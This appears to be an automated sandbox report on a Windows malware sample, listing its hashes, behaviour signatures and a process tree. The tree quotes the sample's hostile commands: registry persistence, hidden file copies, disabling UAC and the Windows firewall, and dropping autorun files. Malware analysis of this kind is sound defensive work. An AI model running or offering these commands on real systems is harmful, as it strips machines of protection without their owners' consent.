Analysis

  • max time kernel
    140s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13/07/2024, 11:45 UTC

General

  • Target

    4188928d42578d01826be310ed423f73_JaffaCakes118.exe

  • Size

    399KB

  • MD5

    4188928d42578d01826be310ed423f73

  • SHA1

    80d1baa6e7384eef1403d6591fcb433a098ba3da

  • SHA256

    d6aeb417cf10f28c0f27f6320ee26bbebe4b7da01e1ce7067a2c5353412821d1

  • SHA512

    4440ee125d00a98fc38621da9e74adeb3ba84d5a3fd99bc58530d1f4574b9e12db34f10d1e1772d232d6c75f2001303b1723aeb2fadbf20892103ce898bebb24

  • SSDEEP

    6144:ipPOC3QN319eNYsHD3AAGoHQH9sWV16w2DklypareA51Pqr+Hf:mODE5HD3LGoHQZykorA51Sg

Malware Config

Signatures

  • Modifies firewall policy service 3 TTPs 4 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Sets file to hidden 1 TTPs 24 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 7 IoCs
  • Drops desktop.ini file(s) 7 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops autorun.inf file 1 TTPs 22 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies Control Panel 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 42 IoCs

Processes

  • C:\Windows\System32\smss.exe
    \SystemRoot\System32\smss.exe
    1⤵
      PID:256
    • C:\Windows\system32\csrss.exe
      %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
      1⤵
        PID:332
      • C:\Windows\system32\wininit.exe
        wininit.exe
        1⤵
          PID:380
          • C:\Windows\system32\services.exe
            C:\Windows\system32\services.exe
            2⤵
              PID:480
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k DcomLaunch
                3⤵
                  PID:588
                  • C:\Windows\system32\wbem\wmiprvse.exe
                    C:\Windows\system32\wbem\wmiprvse.exe
                    4⤵
                      PID:1448
                    • C:\Windows\system32\DllHost.exe
                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                      4⤵
                        PID:1612
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k RPCSS
                      3⤵
                        PID:668
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                        3⤵
                          PID:744
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                          3⤵
                            PID:812
                            • C:\Windows\system32\Dwm.exe
                              "C:\Windows\system32\Dwm.exe"
                              4⤵
                                PID:1172
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs
                              3⤵
                                PID:848
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService
                                3⤵
                                  PID:964
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k NetworkService
                                  3⤵
                                    PID:112
                                  • C:\Windows\System32\spoolsv.exe
                                    C:\Windows\System32\spoolsv.exe
                                    3⤵
                                      PID:328
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                      3⤵
                                        PID:1032
                                      • C:\Windows\system32\taskhost.exe
                                        "taskhost.exe"
                                        3⤵
                                          PID:1112
                                        • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                          "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                          3⤵
                                            PID:1200
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                            3⤵
                                              PID:2192
                                            • C:\Windows\system32\sppsvc.exe
                                              C:\Windows\system32\sppsvc.exe
                                              3⤵
                                                PID:1896
                                            • C:\Windows\system32\lsass.exe
                                              C:\Windows\system32\lsass.exe
                                              2⤵
                                                PID:488
                                              • C:\Windows\system32\lsm.exe
                                                C:\Windows\system32\lsm.exe
                                                2⤵
                                                  PID:496
                                              • C:\Windows\system32\csrss.exe
                                                %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
                                                1⤵
                                                  PID:392
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "-1145587658-1001975761-814076306-932973715-8299959871176630514857513004501955106"
                                                    2⤵
                                                      PID:1976
                                                  • C:\Windows\system32\winlogon.exe
                                                    winlogon.exe
                                                    1⤵
                                                      PID:432
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr /s
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • Modifies Control Panel
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2888
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"
                                                          3⤵
                                                            PID:1596
                                                            • C:\Windows\SysWOW64\attrib.exe
                                                              attrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                              4⤵
                                                              • Views/modifies file attributes
                                                              PID:2816
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\advant.exe"
                                                            3⤵
                                                              PID:3032
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"
                                                              3⤵
                                                                PID:1416
                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                  attrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                  4⤵
                                                                  • Sets file to hidden
                                                                  • Views/modifies file attributes
                                                                  PID:2476
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f
                                                                3⤵
                                                                  PID:2408
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f
                                                                    4⤵
                                                                    • Adds Run key to start application
                                                                    PID:1948
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"
                                                                  3⤵
                                                                    PID:1676
                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                      attrib -R -H -S "C:\Windows\system32\pcclean.exe"
                                                                      4⤵
                                                                      • Drops file in System32 directory
                                                                      • Views/modifies file attributes
                                                                      PID:1716
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%windir%\system32\pcclean.exe"
                                                                    3⤵
                                                                      PID:1992
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"
                                                                      3⤵
                                                                        PID:2004
                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                          attrib +R +H +S "C:\Windows\system32\pcclean.exe"
                                                                          4⤵
                                                                          • Sets file to hidden
                                                                          • Drops file in System32 directory
                                                                          • Views/modifies file attributes
                                                                          PID:1216
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
                                                                        3⤵
                                                                          PID:1392
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"
                                                                          3⤵
                                                                            PID:1692
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"
                                                                              4⤵
                                                                              • Views/modifies file attributes
                                                                              PID:468
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\Microsoft\Windows\rawcircle.scr"
                                                                            3⤵
                                                                              PID:2200
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"
                                                                              3⤵
                                                                                PID:2368
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"
                                                                                  4⤵
                                                                                  • Sets file to hidden
                                                                                  • Views/modifies file attributes
                                                                                  PID:2232
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f
                                                                                3⤵
                                                                                  PID:2008
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f
                                                                                    4⤵
                                                                                      PID:1192
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
                                                                                    3⤵
                                                                                      PID:1552
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
                                                                                        4⤵
                                                                                          PID:1872
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
                                                                                        3⤵
                                                                                          PID:1476
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
                                                                                            4⤵
                                                                                              PID:2180
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c NET START seclogon
                                                                                            3⤵
                                                                                              PID:1336
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                NET START seclogon
                                                                                                4⤵
                                                                                                  PID:2780
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 START seclogon
                                                                                                    5⤵
                                                                                                      PID:2512
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                  3⤵
                                                                                                    PID:1500
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
                                                                                                    3⤵
                                                                                                      PID:3056
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
                                                                                                        4⤵
                                                                                                          PID:548
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
                                                                                                        3⤵
                                                                                                          PID:776
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
                                                                                                            4⤵
                                                                                                              PID:1560
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                            3⤵
                                                                                                              PID:2396
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                4⤵
                                                                                                                • UAC bypass
                                                                                                                PID:2720
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto
                                                                                                              3⤵
                                                                                                                PID:1468
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc config upnphost start= auto
                                                                                                                  4⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1576
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto
                                                                                                                3⤵
                                                                                                                  PID:2892
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc config SSDPSRV start= auto
                                                                                                                    4⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1732
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c sc config browser start= auto
                                                                                                                  3⤵
                                                                                                                    PID:920
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config browser start= auto
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:2528
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c net start upnphost
                                                                                                                    3⤵
                                                                                                                      PID:2436
                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                        net start upnphost
                                                                                                                        4⤵
                                                                                                                          PID:904
                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                            C:\Windows\system32\net1 start upnphost
                                                                                                                            5⤵
                                                                                                                              PID:272
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c net start SSDPSRV
                                                                                                                          3⤵
                                                                                                                            PID:2196
                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                              net start SSDPSRV
                                                                                                                              4⤵
                                                                                                                                PID:2708
                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                  C:\Windows\system32\net1 start SSDPSRV
                                                                                                                                  5⤵
                                                                                                                                    PID:1716
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c net start browser
                                                                                                                                3⤵
                                                                                                                                  PID:832
                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                    net start browser
                                                                                                                                    4⤵
                                                                                                                                      PID:1924
                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                        C:\Windows\system32\net1 start browser
                                                                                                                                        5⤵
                                                                                                                                          PID:1872
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                                                                                                      3⤵
                                                                                                                                        PID:1588
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh advfirewall set currentprofile state off
                                                                                                                                          4⤵
                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                          PID:1476
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:408
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                            4⤵
                                                                                                                                            • Modifies firewall policy service
                                                                                                                                            PID:2216
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                          3⤵
                                                                                                                                            PID:876
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                              4⤵
                                                                                                                                                PID:1552
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:1608
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2356
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1648
                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      netsh advfirewall set currentprofile state off
                                                                                                                                                      4⤵
                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                      PID:1524
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2748
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f
                                                                                                                                                        4⤵
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        PID:2200
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1640
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f
                                                                                                                                                          4⤵
                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                          PID:1776
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1644
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f
                                                                                                                                                            4⤵
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            PID:1076
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2260
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f
                                                                                                                                                              4⤵
                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                              PID:2920
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2120
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f
                                                                                                                                                                4⤵
                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                PID:2344
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1960
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2232
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2352
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1092
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2816
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                          PID:1456
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2236
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                            PID:1652
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          "C:\Windows\System32\rundll32.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2728
                                                                                                                                                                          • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                                                                                                            "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2876
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2476
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4188928d42578d01826be310ed423f73_JaffaCakes118.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\4188928d42578d01826be310ed423f73_JaffaCakes118.exe"
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            • Drops autorun.inf file
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:2112
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              • Drops autorun.inf file
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                              PID:536
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                • Drops autorun.inf file
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:2096
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:2264
                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                    PID:2732
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\advant.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2448
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:2736
                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                      attrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Sets file to hidden
                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                      PID:3024
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f
